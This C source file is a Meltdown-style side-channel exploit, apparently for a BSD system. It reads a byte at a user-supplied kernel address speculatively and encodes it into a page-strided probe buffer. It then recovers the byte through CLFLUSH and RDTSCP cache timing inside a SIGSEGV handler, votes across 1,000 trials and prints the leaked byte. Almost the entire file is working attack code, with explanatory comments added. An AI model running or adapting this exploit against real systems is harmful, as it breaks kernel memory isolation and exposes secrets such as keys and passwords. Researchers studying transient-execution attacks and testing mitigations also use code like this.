#include <sys/ioctl.h>
#include <sys/rnd.h>

#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Not referenced anywhere in the visible code. */
const unsigned		cacheline_size = 64;
/* Byte stride between consecutive probe slots in the user buffer. */
const unsigned		pgsz = 4096;
/* Number of measured trials; warm-up phases are sized relative to this. */
const unsigned		ntrials = 1000;

/* Jump target armed by setjmp() in main() and taken by sighandler(). */
jmp_buf			reset;
/* Target address as parsed from argv[1]. */
uint64_t		kaddr;
/* kaddr converted to a byte pointer; handed to core() as its first argument. */
uint8_t			*kptr;
/* Page-aligned allocation of 256*pgsz bytes obtained from posix_memalign(). */
void			*ubuf;
/* Probe base: ubuf plus a fixed 43-byte offset; slot n lives at uptr[n*pgsz]. */
uint8_t			*uptr;
/* vote[b] counts the trials in which slot b had the shortest access time. */
unsigned		vote[256];
/* Order in which sighandler() times the slots; reshuffled after every trial. */
uint8_t			perm[256];

/*
 * Read the processor time-stamp counter with RDTSCP and return it as a
 * single 64-bit value.
 *
 * The instruction delivers the low half in EAX and the high half in EDX;
 * it also writes ECX, which is therefore declared as clobbered.
 *
 * The GNU alternate keyword __asm__ is used instead of plain `asm' so the
 * function still compiles under strict ISO modes such as -std=c11, where
 * `asm' is not a keyword.
 */
static inline uint64_t
rdtsc_fenced(void)
{
	uint32_t lo, hi;

	__asm__ __volatile__("rdtscp" : "=a"(lo), "=d"(hi) : : "%ecx");

	return ((uint64_t)hi << 32) | lo;
}

/*
 * Execute CLFLUSH on the cache line containing *ptr.
 *
 * ptr: any address inside the line to flush; the pointed-to data is not
 *      modified.
 *
 * The "memory" clobber tells the compiler that the statement affects
 * memory, so it does not cache values across it or move loads and stores
 * past it.  __asm__ is used rather than `asm' so the function compiles
 * under strict ISO modes such as -std=c11.
 */
static inline void
clflush(const void *ptr)
{

	__asm__ __volatile__("clflush (%0)" : : "r"(ptr) : "memory");
}

/*
 * Return the integer quotient x / y.
 *
 * The divisor is not checked; the only (commented-out) call sites in this
 * file pass y == 0.
 */
static inline int
fpe(int x, int y)
{
	const int quotient = x / y;

	return quotient;
}

/*
 * Read one byte through k and use its value to select which 4096-byte slot
 * of u gets touched.
 *
 * k: address of the byte to read (main() passes kptr).
 * u: base of the probe area (main() passes uptr).
 *
 * Returns the byte read from u at offset 4096 * k[0].
 *
 * The 4096 stride matches pgsz, the stride sighandler() uses when it times
 * the slots afterwards.
 */
static inline uint8_t
core(const uint8_t *k, const uint8_t *u)
{
	unsigned long i;
	uint8_t v;

	/* Re-read k[0] for as long as the scaled value comes out as zero. */
	do i = 4096*k[0]; while (i == 0);
	/* Touch the slot selected by the byte value. */
	v = u[i];

	return v;
}

/*
 * Randomly permute perm[] in place using Fisher-Yates: walk from the last
 * slot down to the first, swapping each slot with a uniformly chosen slot
 * at or below it.
 */
static void
shuffle(void)
{
	unsigned remaining;

	for (remaining = 256; remaining > 0; remaining--) {
		const unsigned last = remaining - 1;
		const unsigned pick = arc4random_uniform(remaining);
		const uint8_t tmp = perm[last];

		perm[last] = perm[pick];
		perm[pick] = tmp;
	}
}

/*
 * SIGSEGV handler; main() also calls it directly during its first warm-up
 * loop.
 *
 * Times one load from each of the 256 probe slots, in the order given by
 * perm[], and credits the slot with the shortest time in vote[].  It then
 * reshuffles perm[] and jumps back to the most recent setjmp(reset), so it
 * never returns to its caller.
 *
 * signo: ignored.
 *
 * NOTE(review): leaving a signal handler with longjmp() relies on the
 * platform's setjmp/longjmp handling of the signal mask -- confirm for the
 * target system.
 */
static void
sighandler(int signo)
{
	uint64_t t0, t1, tmin;
	unsigned i, imin;
	/* Written but never read; presumably volatile so the timed load is kept. */
	volatile uint8_t ubyte;

	(void)signo;

	tmin = UINT64_MAX;
	imin = 0;
	for (i = 0; i < 256; i++) {
		/* Bracket a single load from slot perm[i] with two counter reads. */
		t0 = rdtsc_fenced();
		ubyte = uptr[pgsz*perm[i]];
		t1 = rdtsc_fenced();
		/* "<=" means that on equal timings the slot probed later wins. */
		if (t1 - t0 <= tmin) {
			tmin = t1 - t0;
			imin = perm[i];
		}
	}
	vote[imin]++;
	/* New probe order for the next trial. */
	shuffle();
	longjmp(reset, 1);
}

#include <sys/rnd.h>

/*
 * Issue an RNDGETENTCNT ioctl on /dev/urandom.
 *
 * The descriptor is opened on the first call and kept in a function-local
 * static for all later calls.  Both the value the ioctl stores and its
 * return status are discarded.  Exits through err(3) with status 1 if
 * /dev/urandom cannot be opened.
 */
static void
prime(void)
{
	static int fd = -1;
	uint32_t unused_count;

	if (fd == -1 && (fd = open("/dev/urandom", O_RDONLY)) == -1)
		err(1, "open /dev/urandom");

	(void)ioctl(fd, RNDGETENTCNT, &unused_count);
}

int
main(int argc, char **argv)
{
	char *end;
	int error;
	volatile unsigned trial;
	volatile uint8_t ubyte;
	unsigned i, ibest, vbest;

	setprogname(argv[0]);
	if (argc != 2 && argc != 3)
		errx(1, "usage: %s <addr>\n", getprogname());

	errno = 0;
	kaddr = strtoumax(argv[1], &end, 0);
	if (end == argv[1] || end[0] != '\0' || errno)
		errx(1, "invalid address");
	kptr = (void *)(uintptr_t)kaddr;
	//fprintf(stderr, "kptr %p\n", kptr);

	/* initialize */
	for (i = 0; i < 256; i++)
		perm[i] = i;

	error = posix_memalign(&ubuf, 4096, 256*pgsz);
	if (error) {
		errno = error;
		err(1, "posix_memalign");
	}
	arc4random_buf(ubuf, 256*pgsz);

	uptr = (uint8_t *)ubuf + 43;
	//fprintf(stderr, "uptr %p\n", uptr);

	for (i = 0; i < ntrials; i++) {
		if (setjmp(reset) == 0)
			sighandler(SIGSEGV);
	}
	memset(vote, 0, sizeof vote);

	if (signal(SIGSEGV, &sighandler) == SIG_ERR)
		err(1, "signal");

	/* dry run to ramp up the CPU */
	for (trial = 0; trial < 10*ntrials; trial++) {
		if (setjmp(reset) == 0) {
			for (i = 0; i < 256; i++) {
				ubyte = uptr[i*pgsz];
				clflush(&uptr[i*pgsz]);
			}
			register uint8_t *uptr0 = uptr;
			register uint8_t *kptr0 = kptr;
			prime();
			//ubyte = fpe(1, 0);
			ubyte = core(kptr0, uptr0);
			return 123;
		}
	}
	memset(vote, 0, sizeof vote);

	for (trial = 0; trial < ntrials; trial++) {
		if (setjmp(reset) == 0) {
			for (i = 0; i < 256; i++) {
				ubyte = uptr[i*pgsz];
				clflush(&uptr[i*pgsz]);
			}
			register uint8_t *uptr0 = uptr;
			register uint8_t *kptr0 = kptr;
			prime();
			//ubyte = fpe(1, 0);
			ubyte = core(kptr0, uptr0);
			return 123;
		}
	}

	if (signal(SIGSEGV, SIG_DFL) == SIG_ERR)
		err(1, "signal");

	ibest = 0;
	vbest = vote[0];
	for (i = 0; i < 256; i++) {
		//fprintf(stderr, "vote[%02x] = %u\n", i, vote[i]);
		if (vote[i] > vbest) {
			ibest = i;
			vbest = vote[i];
		}
	}

	//fprintf(stderr, "kptr %p\n", kptr);
	if (printf("%c", (char)ibest) < 0)
		err(1, "printf");

	return 0;
}